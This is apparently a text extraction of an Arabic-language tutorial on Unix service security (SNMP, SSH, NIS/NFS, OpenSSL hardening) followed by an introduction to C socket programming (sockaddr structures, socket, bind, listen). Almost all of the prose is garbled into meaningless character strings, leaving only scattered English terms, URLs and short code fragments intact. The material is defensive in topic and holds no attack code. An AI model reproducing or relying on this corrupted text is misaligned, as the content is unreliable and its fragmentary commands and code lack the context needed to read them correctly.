6 1 )$,< Q 0 (E ( E xined , & ?& #4 agent ) 0 < +H ) [ h,/ % H DY/ SNMP? 5 TG' g• ?@ " - Y 7 ) X (,! 7 I 5 $SNMPv3 N& ) 6( 4 , K 6 < % P " - Y • T, _? # 7 I5 W 3 " $) ("c 2 0 - Y _ - ),. ) ) 7 L )- ) ( #. 6& ? G -, < - Y ] community P! h,/ % H g & ) 0 @ 3" ? , O* u& ("c : 2 0 (E N "W 3 6 F 7 # " - Y • P ! 6& -, < ' - Y $http://www.sans.org/resources/idfaq/sanmp.phph @ ) TCP/UDP , C ' W L3 • SNMP " - Y 7 * 0, < I ] 6- ^ w•w7 4], K5 B' , ) ) 6- l '7 B 5!0_TCP/UDP ) X # y B' #P < # 40 (E 0, 6 ( E $-,< &5 $ , -,< K SNMP• B ^ w•p7 F) F 3 7 L 6subnet 2 SNMP " E ' 4 6N I5 SSH (Secure shell) % 'T F$Login " )7 l ' * ] OpenSSH &'( 25 " U# P - Y $SSH Communication Security R- ) telnet$ Ftp 6 ,G P 6=GX$ -,< - < * &K/$ ? @ " , ,G ) - ,, 2 5 0 b _ U) $l ' R 4 S @ : _U : F 6=GX Q 0 F) )- 56 ?# $SSH " - Y N5 6=GX ,< F -,< K 7 !89 Q $"), ) ] nix*) "), ) 1 $U# 0, 5 Command P B '8 i: ] #P < SSH # ? `56 1 )$,< K &F 7c #< C ' )? , (, !$ 6 Q0 )_open-source 7 L 5 ( ,H ? @ ? 5 M 9 R 4 S @ 2< ? ,6U) ) 6 E * P $SSH 5! U ) bP 0 ?5F SSH 6b. SSH-, < " - 4 6* SSHS %K , ( N ) 6Patch $("c " # ) , #4 0,< , ^P < TP, C L3 3 W 3 78# ) SSH2 K 6% # ) 4 & ) HTTP$U ) $telnet -, < - -, 6 U ) …-, ^ P C $_ SSH2 SFTP U) L3 A" R4S 4 Kc F) ?@ ? # 2 # " @% W SSH2) SSH1 ], < ? # -, 6 U ) ) -, 4 (,! 3d * 6 * R4 S @ , 5 6 &'( F " , G $OpenSSHb & < - < # 2 6& ) clear text 7 L -, L3 2 U) P I $ SSH1 % # ) 40 H session & SSH2 # ) 0_ OpenSSH " 2&N F , 5 ,H]POP3 ? , % 1 2 , 0, < ], N, # @^ 6A) a I ]rhost 6sessionS % # ) 4 " - Y $ #P< ) : R 4S ;! _rlogin) rcp rsh$, K 7 !89 T )- P d * ("c0_ SSH * ("c F) & Z Q OpenSSH ? -,< E 6% 4% CERT 2002-23h @ " ? $ 9 l ' * ] OpenSSH " - 1 @ * I 5 0, 7 K &F " 6 @ pqqp T 0 5 - Y Advisory ) ' 6S @ ;! ) A % 3 6 ? " R 4 S @ (, ! " ? 59 ) : I 5 0, < trojan-horse _ 2 7 !89 S - Y http://www.openssh.org/txt/trojan.advh @ " ? $l '- 1 @ * 0 5 ,, e G -,< K * ]?@ " ,G OpenSSH 3.3 ?@ ) U ) SSH Communication Securitys SSH 3.0.0 % ! 
6 1 U# * 6 )_version 3.6.1$pqqp T Z F ) S L _version 3.5.2- 5 < pqqs T -, < K 0 < ,6 3 * ] ?@ " , G HS @2 e G $ R4 S @ d * * R4 S @ W L3 -,< SL U) * ("c - 5< " $“ ssh-v“ ) - " d * 6* $S N 4 ? : 2 & $ ScanSSH0, Patching (,! % 1 , 0,< - 5< ^ P ScanSSH * " - Y 0 #P < 6h @ 2 3@0, 5 K 4 6Z 0 5 SL ?@ http://www.monkey.org/~provos/scanssh/h @ " ? ' a Patch2 3@ ) R4 S @SSH? , 6 ! " %& 0, (E - @ < &) j 4 ? , 6 U ) -, < K pqqw T 0 5 F I5 , Y 1 $ ScanSSH :3 " ? - . F " * $l ' R4 S @ : % 2 3@ ?@ ) 0, < 2t5: ?@ * ' DY/ I 5 )SSH * - 5 OpenSSH )SSH # $,< -,< SL $% ! ) openSSH 456 123& % ! -, 6 K " 9 2 3@ SL " $OpenSSH" - Y 7 • SSH1 G : 0, 0,< ? , - * P , TL ) I - * 6 & " 6 -, 6 U ) S! 5 $" E ? ! j &' 0 6A) $?@ I5 ? @ " ? , # 4• U) S 2 0, 5 U) N 4 )• W L* ,K , #4 SSH? , 2#5 -, " I 5 0,6 d * ,Y : 5 5/ rsh 2 NO , $SSH , # 4 % ' FallBackToRsh, B P -)8! S ,6 3 - 4 * )? @" - Y 6 ) ? - Y O B : 2#5 $DES3A) ] L F TL ? " 2` 7 3 5L -, @ ), . ? # 0, 6 ( E 0 0 F) $SSH-,< " 6 2< " - Y ) ) <, ! 5E F 6 & " SSH SSH2 G I # 4, G ), 51 /• SSH2 SSH1 * $ Z - Y DES3% 2, 0_,< -,< ' 3 P ( #. N& " • blowfish I 9 * " & -,< ( E e 'j 4 N& $ 7 B 5! + ,I ! + ; Q NIS/NFS ) $(Nis)Network information Service)(nfs)Network File System U) Sun ) $ NFS0, < <b #P< F ) V < ? # l 'U ) 6 '• & 6 6 2 " - Y 7) Y 6 % ' I , 6% ' Q ) u T 5! ? # $NIS & 5 maps] 7 u T5! 7 ) X (,!]0, 5 ?# ^ 6% 'V 0 -, ) L*< 6 $ nis0 7 U# 6 #P < I 5 Microsystems < " - ) 4 ) / 9$U# F 2 % 'V < , 6% ' A) $ NFS0 , -,< +" , 0, 5 -,< - Y !89 U) 6 'hosts)passwd 6 '_ !89 ] : 7 !89 K $NISM,62 5 0_ #P < " F 6 I 6 5 group)passwd ? ,K & 5 =GX C 8Q] NFS I #P< 6U ) B'0 I5 ? @ " ,G ? @" , ?5F 3 ?1 ,, e G 6 " H NISb I K6 &'( " - Y I 5 NIS " (& # 0 ? 5F ,K ) 6, " 0,< dos$buffer S ', 6? G F 6- Y/ " - Y Z -, < - Y - Y patching)NIS)NFS 6U ) $S F 6 0 _? F 3 785/ , 63 ) - !89 )- B . 7 3W 3 F - ?5F S 6=GX ) ? H ypcat j 5 P! 
& $() * - 5 U 0, < 1) U# NFS )NIS " +, 6 5 CP TG'e 'j 4 7 L $ l ' 6U ) + 6U ) : ,F ) ) - 0, < K NIS)NFS " * -, "2 (E R4 S @ 0, - 5 - Y 6U ) )- \ " -, < ( E 785/ Q 0, -, # 4 (, ! 7 % ' $NFS)NIC 56? 5F $ l ' 6U ) , K 6maps] _ I 6=GX , G 785/$ ? @ " - Y overflows - _ < 0, ! ". /0(123& R4 S @ d * I5 a K6 * 5 0-, ), , e G ,1 b ,< -, -,< K SL ? @ ) F patch 2 3@ " - Y NIS * I 5 0 ' 6 @ -,< SL NFS * j 5 & NFS * 6@ - 5< l ' • patch 2 3@ SL " ? 59 ) rpc.mountd-version - 5 <" 4 6* Q ) -, (N 0 < ,6 3 HS @ - 5< " ? ] 5 - Y ypserv-version " ? 0_ ,6 3 (N R4 S @ ^ 0 R4 7 N 4 " ? $ &'( , ,F 6=GX W L3 , "c a 4 NIS map ? 2 0 F P! a 4 NFS S 6" E ) netgroups$? % ' & ? 7 L -,< 3 I5 , N (,! " ? 59 • 6& " • I 5 cracker " -,< = G 6& ( #. " 5 , # 4 (,! password root 6 0 5 - Y $-,< = G - Y NISS " I5 • R4 S @ d * P ! , # 4 (,! ( N W L3 3 I5 ("c • etc\exports\. ) -, < export " ! -,6 I 5 showmount e F• 0 ?@ 6 R4 S @ : % 4$NIS , # 4 a " ("c N 4]? , U) NIS? , 6 U ) ) 0_NIS -, 6 U ) -, 6 U ) 67 S 2, 0 4 n 9 " ) -, - Y makedbm ^P " ? 5 d* • i ? G 6 TG'Yp-secure U) DY/ - . 6I W L3 J)$ DBM 6% ' E ? " b 1 - 5 S ˆK " ? 6 : 2 3 0 • C ' ,6 3 v 4$" E 0 5 -" /var/yp/securenets 4b 6 #P< ) U) a % ) ? +:*:0:0:::z • password map 4 NFS , # 4 ^P - -" F etc/exports % ' ? , U) " 6h @ " - Y • qualified domain names]fully_FQDN ) IP ,! 0_ < & z • - Y ypxfrd) ypserv 6 0 NFS ? , 5! # "] G - Y $ NFSBug ( 0, 5 " ? K , , #4 I5 ! I5 • #4 7 # l ' 0 5 $NFSBug " ? ' 0 5 - Y ftp://coast.cs.purdue.edu/pub/tools/unix/nfsbugh @ % ' : I 5 etc\exports % '" - Y • ),. T5! a " 25 ? )&' NFS % ' 4 U) mounting " 15G ? domain ( ^ 4 ? )&' NFS 6 G5 … ) IP h @ " U 4 home10.20.1.25(secure)a8Q0NFS -, ? )&' ? ^ l '7 B 5!0 S IP " U4_2< ) ?, 3 0 NFS % ' 6" E rw ) ? 5 export … ro]("c , 3 b' ( E etc\export % ' NFS -, U) 6" E domain ( ./ro)10.20.1.25 homeC 8Q ^ Domain ( ) IPh @ " , G root_squash superuser $, < -,< TG'l ' NFS -, 6 U ) ) 4 # H$ -, U) - Y NFS? 
, 0 ID nobody 4 "$ ?# 7 NFS -, U) user root S ) 0 … U) ID root ) 2, 0 2&N F , 6 * root ) 6% ' u root_squash/.)10.20.1.25 homeaC 8Q ? l '7 B 5!0 0 TG'7 4 y 4 % ! 4 NIS ) NFS 5 ?,< V8 " ? 59 ^P I 5 T) ' 6 • n 9" C ” ' " ) (_Rpc.nfsd] pq‹{ 7 4 )_portmap]www7 4 C 8Q] U) ) ( E ./etc/system % ' 1 line set nfssrv:nfs_portmon ? )&' a 67 $U c $ NIS)NFS ? , 6 U ) N" • ) X ?# 0 <( E " E ? , g 0SSH• I 25 % # ) 4 2 NFS" - Y W L3 ) • ("c 0 5 - Y http://www.math.ualberta.ca/imaging/snfsh @ " ? NIS ? , 6 U ) , # 4 ) SL Z )? , ^ ,1 b -,< K 6 @ 0 F 7 !89 " checklist UNIX h @ " ? $=! > 5 SL • 6patch * %K : $ NIS) 2 3@ ? 5 m .1 U# 0 5 - Y security d * K6 W L* deamons ) ("c N 4 0 5 MR/ , K ) / 9 NIS )NFS -, 6 U ) I 5 0, -, ) " NIS ) NFS? 5 TG' g• ^ 6 )]NFS ) NIS _?@ ) 6U ) ? Layer open secure sockets (SSl) ? )&' H I5 f ^ P N, # l 'f #4 " -, (E N ,G #P< n 9 " - Y 6 open source 7 L ]openSSl &'( $_ 2 K6 -, < 1P 7 !89 j &' ? ^P , 5 4@ -, 6 U ) SB g ? 5F 0, 5 " openldap,cups,maila I OpenSSl0 < , 6 3 a 5 - <? @ H$ l ' R 4 S @ ^ N H F 5 " - Y 0, < 2 ,G e G 5 openSSl - Y openSSL ,G $( * # 0, - Y - ?5F 0( openSSL 5 & , 5 ? $ openSSL M, 6" 0, 6 - Y openSSL 6 25F 6 #P < I 3 785/ $ : u 3 3 K O* " H a, 5 5/ I 5 ],< openssl " - Y $ 7 I N& H M, 6% - Y openSSl " 4@ -, 6 U ) ^ P $hhtps " 0, - " connectionn N& 3 <) 2 5 $ 0_‹‹s 7 4 ) * R4 S @ ^ $() $T) ? G - *1 , ,, e G % ! 6 F ) openSSL 0.9.7 * ?@ ) U 0 < ,6 3 1 ) U# HS @2 e G 6 " $ 6 F ?@ " %P H R4 S @ d * ,, e G $,< -,< SL ?@ " % H I 5 $ openSSl version " ? ) versipon 0.9.7a * : 2 0 5 - Y $-,< SL # 0 < ,6 3 &'( * H S @) - 5< " R4 SP @ : % a 4 " - 5 OpenSSL # 9 * 2 3@ 9 % ! %L 0 I5 "2 F 6 & openSSl -, 6 U ) ) • ?@ ) ' • ) ipfilter" $? # 7 K6 <- Y Z , 1 " $,< -,< SL % ! 0 5 SL T 5! DY/ I 5 2 , ,F ) 2 3@ -, 6@ DY/ - . $l ' R4 S @ : % $ openSSL * - . : ), . $, Q2 gN8 3( 2& & Socket Programming K &F ? G ) ( E % ! Unix % Q 6% ! ? , u 0 < F) M :G 2 @ TCP/IP – B #) 4 " 6‰ 9 b bP S L ) K ?@ - 56% ! h ?@ IP)TCP B #) 4 SB F Linux % ! 
- 4C c 5G 2 ?, Windows % 6 " 6N "@ H8! I R1 6b . %B .) 0 N C %Q @ , 6, b. u ,6 * U ) - ?) -, < = D U / 9 < b. # = G c • A 3 ) ) W 3 # ) #1 C5 6 2 ‰9 6Y . , U BT 6 K6, $n5! , GCC F 2< ? " c . K %L'2 , • ( Y ) #P< TCP/IP% # ) 4 i . e ' , 5 % <@ #P < . H 7 -J) 7 # G( 0,< e 'T/ % ' , 2< A) - 0, 5 %L'2 0 b. 4 b. 1Q ) 6 K 2 `56) ) Linux % ! 5 63 6C? " , , < 0, -,< 5F ,63 PE . ( Y2 . ( 6 ^P '#< ,P 1 " g@ : %L'2 0, #P < . Y( H ?@ ( Y , (5 I %L'2 c ,< 6 P" U# (5 % ! ) ,< \, 6 ) 4 2 - / y ?/ 9 b ? F T P) #P < 0 % ' 7 b B'" ) N4 , & (I/O) 6 F) 3 ) , 5 6Y ", - 6U# 5 <, < $, 3 @ T, • , < -, < ) )\ , )% % ' b. B 5F 2 5< , < ! ( 5 •0 < T, ) 7 @ L N4 # B % ! N N) (E " , T /2 ! )- 7 B 5! 3 , $2 k a, 6, (Read Only) < b' B'7 L ?@ , ( _ fopen() - <? ! % ' L* % ' , 56 N4 open() 7 % ! &@ _=1 ] 0, ' %P H B / " E _O 0, 2< 15G 7 0, ?56 , <T N4 $_ fwrite %PH B / " -,< " % '?) _ fclose() ? ! ˆ6 0 ) ) ("c 2 -, ! 2< close() 7 U 0 ,< ,6 * B / , j 5 .Y % '( , H 4" ] 0, , P % ' ( 5 " U4_ 256 < ( E , B 15! ) N4 * ? G N4 ", - # H- Y 0 , 5 T, % '? ! # ), , F) 3 ) =B* a, R " 6N B / ?@ " ?, 3 j 5 .Y 6N # U B 5! ( 5 ,6 3 M Y< ) - )? # @0 (5 H U# < b' B' N4 , 3 b' , 3 B'T < ) < ) , 3 < ) 7 , 3, F ,B B'- B'U# I/O \ L % ! a 6 5< $ , 3 B' * , 3 b' (con) I ) ) 6- & , < ) 3 = D) 2 0 < ' 2 _z ]% ' C H ,< 'G N4 b '$ 6- write() 15G k ) ", - % ! , ) % ' ' b. 6 ' R4 ? … B' N 4 … ? G j 5 .Y … B'T 7 4… ) GH ) % ' … ) GH ) % ' … 11b3 FIFO = … # 2 5< 26• T/ T, ) X ! % H , % ' F) 3 | ) ) 6 ) ?@ 2 7 !89 1P ) #P< ) ) ^P @ € , (I/O) ) ) 2 ^P - N@ 6, 5G #P< ^ P a •^ P • ] H ' 2 T 5G nP9 7 ) - 0, 2 N g ‰8: ), ?) " IP h @ ) _d * , , •^ P socket() 5 ˜4 g - < - <• &@ $, , $ &@ 0,< ,6 3 - Y - <? 6 ' ^P ' 7 3 ,G I ) #P < 6- , 6- 1P 7 B 5!_z , SB 9% ! 0, & , 3 ' 1P ( ,H [ 1P 7 , ? 1) ) + _O ?@ " 6- ' %5! P (Null) —14 5< % ', 56 ^ P ,< ( 5 + 7 4h @ 5< % ! 0, 5 " 6 6 '_d * %5! ? read() ] rece()) [ write() ] send() + _=1 ]W 3 ,6 3 ?56 $%P H B / 6 3 % ' - < 0, % ' " T) b < ,6* % ! 
?@ ) W 3 & @ ' R4 % ' 3 3 ?@ " •" N •" - 62 " U4 ) TSAP : ) 2 7 !89 1P " ^ P ) 0 ,< ) ) ? " , /) % '2, #P < . 6 ) $, 3 6^ P 2 " 6 L* @" ? &56? B', 56CH < _% ' - < ] ) < " ) TG'^ P 2 , 0 (E - @" ? &56 : 1P @ " (, @ 6Y ) 0 , F) \ ) a ", P ! 'G \ ) 2 _0 , 0 < -, N1L \ 6 56 I " 56 1 ), 66 6 #5 \ \ 6* N \ ] 6 … 0 < 6 Y 2 7) Y $ \ -, TL ?), \ ) 2 ( Y2 &5 6 T A) 0, 6, ' 7 I 2t 5: ) S N` 6) 2t5: ! ( 6- 2 \ . ) P! ™Y/ , " $ (FTP) % 'T %# ) 4 TQ ? G 0, TCP A) ?56 (SMTP) # ) #1 6 T - \ " C GP 9) , 1P 15 / F) 6- 5> K6%# ) 4 ) 7 ,3 Q ? FS ! 2 `56) 6 (HTTP) 2 %# ) 4 6:3 ? FS c 6 6- 7 ! UDP ) TCP \ ^ P 0, < , -,< = G ( … ) j4 ) , \ , H I, 0 - ( 7 .Y T 62t 5: ^ P H %# ) 4 , " N56 0, " 13 ) S ! ) 6 TCP % # ) 4 0 H ) ^ P ˆ6 . %Q 6 H " $ 6- ?, " 3 A) 2 2 / 0 P CH B / \ # A) 5> 2 6" 78# (5 TL F) 6- )- ,6 3 ,6 3 (8! % ! + ) >' ,6 3 i: 6- " - Y % ! ^ P = G" 1P " UDP 0, S 6- 0, < ) $TL 2 5> L ) , 0 ,< & 1P " \ 1P 6- , #P < 6- P( DNS H- Y TCP 6% # ) 4 " - Y ) , ), < 1 ) 1P :3 0 UDP %# ) 4 ?), ) N 56 IP %# ) 4 ) , 5 +H ) ?@ 2 " c %P H CGP9 ) - ) 6- B # ) 4 TCP ,< - < C 8P H 6- < T T ! 5< / UDP 3 !& ( Y 3% 5 C 85! = G U TCP %# ) 4 7 K &F ?,< E $^ P H F ?), " | -, 6 U ) ( Y G ,< '9 ) 9P \) < I.1 " 6 F % H ^ P 2 ' 9 R 1$ < # ^P 6 ^P 2 0, < - 0 % ,6 3 = G (8! % ! š7 ^P 2 6- < #P < ) 4) 2 6- M 9) R4 ?# # 2 ^P C 85! 1P 3% 5 YB^ P -, \) < $2 '9 1P $^ P A R4 7 C, ! H • • 0 ' ,6 3 ( •-, 6 U ) 0 ^ P -, •_- \) < ?@ I ) ] a 0 2 7 !89 % 5 ) @) ), SB 9 , , " R4 R4 5! = G ) 4 Client c C ) 4 Server -, 6 U ) 3 !89 , /) $ X task , 5 I ) RN V < 7 !89 0,6, % . I $- 7 P! I T /2 ! - )- ? ) 3 F 3 O) -, 6 U ) O) 7 .Y S1H ) )- 5 < SL -, 6 U ) ?@ A" -, 4 " U4 )- 2< ' \) < -, 6 U ) H) TQ ? G !89 7 .Y 2 " 0, 5 T ) " 2* X X 2 ) 5 v 4 ("c -, 6 U ) ^P H B 1/ 2 P 5 X , 5 T I S v 4$X 0 7 !89 3 $" ) ,< ,G , 2< ;. , ) -,< +" 6 5 6 / 7) Y < ) N] 0 6 ^P % M 9 ,G 0, 6-, 6 U ) ,G C c 5G 2# 1 _0, ) N* 4 $7 !89 S/ , * H -, , T I Y , N I N M 9 – …-, 6 U ) 5 –, 5 T * 4)j N ;. 
5 … 4 B F TQ T \X I : -, 6 U ) 0 5 3 ,6 3 7) Y $ < % $ a % ! b' \ % ! % ! , b. F $ 0, + b (5 2 0, 6, , -, 6^ P ? 6X A R4 I ' % <+ 6- ) >' , TCP ^ P Q ,/ , 6X 4 E " < A) 2 G Q ,/ ? G % ! ,< ( E bind() ) TCP TCP 5 6 6 $ " 5 ,< ,G B / _z 2 0, 5 \) < TCP ,< ,G ^ P A R 4 (8! , ' F )T ) -, < ' R4 ? &56 , " U# _O < (8! % ! b ^P ^P ,6 5< ( E listen() G ) " - Y -, 6 U ) , 3 + b ( UDP 4 - 5< UDP A (8! " / 4h @ , 3 , - 0, ,G 2 G C c 5G 0, < A" TCP ) < ) A R4 TCP 7 9P - / &1bind() 2#5 ? 3 2 _=1 = G, " 4h @ 7 5< L* 2 'G W 3 7 ,G #B 3 H ] 0, _0 ^P P 7 5 5 ( E Socket() 5 - 5 < ? <,L R4 ? G < ^P (8! % ! : 5< I -, 6 U ) 'G ( UDP 2 0, K5 ) # @ " %P H 2 `56) -, 6 U ) "7 B 5! 0 < 5 1 5 0, ) ( Y F T/ › (E B / 2 56 |-, 6 U ) 5 ,6 3 , " E ,! F N1 a K5 , 5 6X H 0, N ("c >' :, ,G 2 , 1 )$ 5< 0 7) Y ^ P 2 , T G') " 7 , L L $? &567 L , 7) Y B' , G " < -, 6 U ) ) 2, )@ 6" 7) Y ^ P 2, Q ,/ ,G % ' 0 < " ? &56 : 5< ? G 0,< b , < ] nB G 7 9P " , X " accept() + - Y % ! Y D 7 # accept() + 0, % >Y 'G 5< C _ _ F) 7 0,< ,6 3 0, K5 - Y 0 ,6 3 5 recv ) send 7 1P R4 ?# A) ) 2 0, 6, 5 3 _ close() + b ] ' _ shutdown() + b ] ' )T _- ^P C _) '9 ) ^ P +:H … 7 B 5! " # ':# +:H … a < T5! % ! b' E 0, ) F $ ^P 0, P 7 4h @ 3 U) ^P -, 6 U ) H , 56 -,< (8! ("c ,G B / , F) bind() " - Y X A 3 #B$ ? N " ^P connect() 5 ?@ 5 _=1 6^ P = G , " -, 6 U ) 5 L* _O )&1 G , 6, + " - Y X X I ?@ , ,< -, 6 0, TCP ^ P 0 H 9P 2 TCP 7 9P 5 _ Hand Shaking] B / ( E ) \) < 1 C 85! connect() R4 < 2 M 9 1 ),< 0 ( , H 6- H ' )T ' G 'X $ &@ ˆ 6?), , %/ $, < " bind() + " - Y ,6 * ("c TCP ^ P # ^ P -, Y < , 93 C,E 3 7 4 - 5< \) < ' connect() %5! ) -, 6 U ) 0, 5 0, 5 ( ,H 60, 5 +:H '9 '9 ) 7 ' T shutdown() send() ) recv() + close() + " _z ^P _ ?@ H) 5 -, 6 U ) " 5 6 1) ) + B 2 `56) 60 6, ("c ?5 3 6C _0 , ^P \ 6, \F u $ "= G `56) ?@ - N G H ) i. H 6- " g@ • L* •$- N \ 21 ) ) H- Y a,< L* $^ P = G C 8G'0 ?5 3 .$ ,! 
` -, 2 $% ' - < , 56 ) 47 4h @ 3 ?@ G:H ( 5 ] 0 ?5 3 " 6 u " U4 H P " N1 H - " , A int A; \ 2 ) ^ P M 9 2 < IPh @ 3 a "7
struct sockaddr {
    unsigned short sa_family; /* address family, AF_xxxx */
    char sa_data[14]; /* 14 bytes of protocol address */
};
2 G & 2 / R 1œ ' , 6 3 \ , 6 #P< d* B #) 4 ) TCP/IP % # ) 4 N 0, #P< ;. 6 $ IP h @ $7 ) 7) Y 0 < 5 -,6 ! 5E 5 2G [ 3 - 3 & 2 Appletalk %Q ,6 3 7) Y 4h @" , B #) 4 8G'0, C AF_INET 0 N I %L'2 % d* 3 a sa-family … - ) ) ) #P< 7) Y 0 \ 2 a sa-data … - 6, B'2 c = G 1 ) ) )Y = G 1 ) B PH # T G CH a, N - < - *1 ( , 'G ` 6" , 5<
struct sockaddr_in {
    short int sin_family; /* address family */
    unsigned short int sin_port; /* port number */
    struct in_addr sin_addr; /* internet address */
    unsigned char sin_zero[8]; /* same size as struct sockaddr */
};
#P< ), 2 G - 3 d* # I ) 8! ?), $i. d* ,! C 8 , 56a Sin_port … [ , ) ,B'2 a Sin_port … ) 47 4h @$ A 3 ,B'2 0, % 3 < AF_INET 0,< 0, 5 B P H 2 < IP h @ a In_addr … I , , b '$, < , 6 3 = G 0 Y , , B #) 4 8 C , 6 #P< ( 5 <= G , ( Y l'# IP h @ C 8G' h @ T 9 6 #P< " - 62 a Sin_zero [†] … 6 ?@ $,B'2 2 #P < N #P < Y C 5 memset() % Q G 9 F) % 1 0, < ) -,< - Y T G 7 0,< - Y % H #P < 3 1/ 6 ` , C5 / 1 ) 0 < $7) Y B #) 4(5 ) 7 4h @ " N62 'X 0 62 , 0 < " (, 6$+ 3 ' ? = G " - Y \ 5E ) , T G CH 1 ) N B P H ` F •\ n : • 0 ?@ 3 -,< = G in_addr ( N ) # () ,6 3 , 5 H # @ / () # = G 0 "7
/* Internet IP address (a structure for historical reasons) */
struct in_addr {
    unsigned long s_addr;
};
l '7 IP h @ ?@ = G ) ?@ 9 0 2# 1) , B P H # T/ 6 - Y <) 5< - *1 I'/ 5< ,6 3 6 a < F - 3• 3 2 1 6,/) S < SL " LE \ " < 6 , - m.1" G < 78# _- < 7) Y <R -,< n' DE 7 H) R1 S E! 5 6, B' F) LE \ ) BE \ H #P < ) c , ,< - < ) , B'2 'G unsigned long 6" , 7 5B " I 1 ) 0,< , 6 3 'G ) % $, -, < = G c 7 %# ) 4 N TCP/IP S LE ) 3 < H) TQ ? ! 0 3
struct sockaddr_in as;
as.sin_port = 0xb459;
" U4 R1 H A" I _- P< CG:H )] 4 ?@ " ,G ) < - 3•T) A" 7 4 h @ TCP "7 ? ) 2 2' H a,< ,6 3 B4 59 ) + , 6, H 6, B'?) 
, 'G % 1 2 56 0,< a S ) X U htons() a BE 1/ htonl() a BE 1/ ntohl() a 2 < H) 2 ) 2< \ ? N #P <U ntohs() a 2 < H B G' 1/ BE " B G' 1/ BE " & ? ! " ) 7 5B % ,P + 7 5B % ,P + ) 7 5B % ,P + 7 5B % ,P + , , A SL " ) F- Y 6, B' 2< ? 3 ("c U LE 7 H " %PH C 5 /? 0, - Y l '+ IP TCP , I ,B'C < - Y l '+ sin_family , B' sock_addr_in ` -, < = G % ! l '+ " <@ l '+ ,B'2 ) " H) b'a R T Q? ! < I H ("c , B'2 6 , - Y < 6 3 [ AF_INET , R 1$, < ,6 * % 1Q #P < ) ) 0 5 - Y a 6, B' IP S1H @ < h @ ,B'?) IP h @ I 78# , IP •2 6h @ ;.P a, < < 6- pwwžwwžw‹qžw{p ,! IP h @ ,B' sock_addr_in ` IP 3 @O L F "+ ) 2 1/ 4 long \ " ,! < a ‹‹žwwžwpwžw†} ( ' , B' BE S1H < ,! % ,P R1l ' + 2 a inet_addr() + … U4 ) < h @ c TQ 0 h @ 7 L G ,6 B P H + % 5! U#! + 2 ainet_ntoa() + … (E IP h @ < ) struct in_addr \ " l '+ H 9 7 L ) ) 4 0, 5 a " TQ BE S1H @) ' % ,P $0 = G : < \ ?@ F) 3
printf("%s", inet_ntoa(ina.sin_addr));
k F) 3 ) - G ) : < 7 L h @ a "( ' . l 'TQ F) 3 C 8Q 0,< ,6 3 wqžŠžw‹wžwsq IP h @ www.ibm.com ( ' -" / )= ("c + G , ?@ " % P H0 @ % ,P N N @ * 6 3iX b. 0, < = G ^ P _ TCP P] -, 6 U ) H - Y + Socket() + a "7 + B( '
#include <sys/types.h>
#include <sys/socket.h>
int socket(int domain, int type, int protocol);
- <C 8PH . I AF_inet 0 < \ , , , , (8! Type , B' ?@ , 3 -, 6 ? [ , $ ? 6 *1 #P <U \ \ 0,< ( \ " H sock_stream ) 6, I ? I %# ) 4 0 #P< . ,6 56 H( #P< 6 ) T) 6, B' 0 –, G + ?@ " " R 1_% ' , 0 Ÿ + 2 N <- Y , ,N H , F) 3 C5 / , YD U + 256 F) 3 :3 - 5 < error " ? G 5 <) ,< , 6 3 'G + , , + :3 - 5< A" < 7 B 5! u ,< …w , socket() + Perror() 5 56 5 3^P ' %5! ,< …w socket() + , ) ) - P& @ , [ - < % Q C H ] ,< ,6 3 - Y 0 < =H ,6 3 ?56socket() + b L* L* a Protocol … < - 5< ,B'2 Y ?@ , [ I Sock_DGRAM 0, , ,< a type … 42 \ ? 6 *1 3( 4 2 a domain … 6 , 4 0,< H) - 5 ) , = G " + ) u ) 2 0 -, @ 1Q ?@ # A) 0, 6 a Bind() + ^P y b'5< bind() + 0 h @? 
-, P 0, 5 6 a, H (5 , ,6 - 5< , < "- 0, 5 = G 5 c 5G C •-,< " 7 4 ( c 5 / = G2 C U4 " Bind() + n 9 " W 3 7 4 - 5< ^ P http %# ) 4 TCP ) A" H) ˆ 6" 6 1 ), - j6 3 % ! †q 7 4 B . 2< % ! G -, 6 U ) 5 A 5< 1P B 5!• , ,6 5< G2 " ( E 6- F ) UDP TCP / < 6 4) 6X Y 2 `56 H) TQ ? G ( 5 $-, 6 U ) % .$ †q @ ,L " 7 L bind() + a 7 4 B( ' #include<svs/type.h> #include<svs/sock.h> int bind ( int soskfd , struct sockaddr_mv_addr , int addrlen ) 0, - " socket_] + " - Y 0, 6, B . P " h @ L* -,< " 5< , 6 3 < IPh @ ) 7 4 h @ $ - 3 % ! @)- - N@ O* 0 S / =:1" 13 @ < I Y ' L - 5< My_Addr ` - < , 7 $ •ŠŠsŠ 5< F) 4 h @ , B' 2 3 0 3 T 9 a Addr_len … # Bind_] + U# wqp‹ - 5< " 7 4 0, / a My_Addr … ` 0,< = G C 8P H ` a ?56a sockfd … 8P C H I b . _= 1 @2 - 5< ? ! 2 , < wqps -, < ) " # Y 2 6-, 6 U ) 0 ,6 * ? ?@ )z * ) 4 , P 5< , _O 6-, 6 U ) 6 I INADDR_ANY $, , & 4 - 5< 4 2 " -" F % ! IP h @ , B' [ , IP h @ 5< B . 2< ) U# 37 b. % ! 0 c 6, B' 6 ?@ , % ,P BE 1/ 1/ Y , 1/ ) , Y N- 3 ?@ ?@ HTONS_] + , ) 6a - ) " 3 5 <" % P H " ' Bind_] % 5! - N@ , < u $ :3 \ A" 0, 4 , # ("c 2 " 4 5< ?@ 5< G , % ,P 3 ,6 3 " H #_ O* Bind_] 0 ,6 3 - ?@ % 1 0,< N - N@ 2#5 0 - _z …w , _- G ,< ) - P& @ PEAAOR_] + ) :3 - 5< Errno :3 7 L* a Listen_]+ (8! - ^P % ! + 2 b TCP ^ P 6X 0 ), 7 P! _+ N I )- = I.1 $-, 6 U ) , 6, 7 4h @ + b 0,6, G] , G ? I R H 6U) ) " ) T G'7 9P @" = a "7 % ! , (8! ) - < 7 4 - 5< H X , Q ,/ @)- 5 ,G Q,/ 6X I.12 " ", - " U4 TCP ^ P @^P )$ b'+ 2 TCP ^ P 0 F? " 2, A) G -, 6 U ) 2#5 ? " 6 9 F 7) Y ) 4 , , , % ! 2 H B / # < (8! % ! + #@ , Listen_] B ( '0,< W 3 7 4 - 5< Int listen (int sockfd , int back log ) ; 0, - E ?@ , L* ?56a Sockfd … 5 " 0 I -, < = 0 erno u ) ,G Q ,/ a Backlog … ) nB G 7 9P , 6 3 …w+ 2 , backlog , -,< ),. pq :3 ") 7 B P H+ 0,< - ,3 , 56 :3 - 5< Accept + a < H ?@ ( Y - < ) _] + ) 4 TCP ^ P 6 H) 0 < 2 " , M 9 7 B 5! , PB : + b % ! 
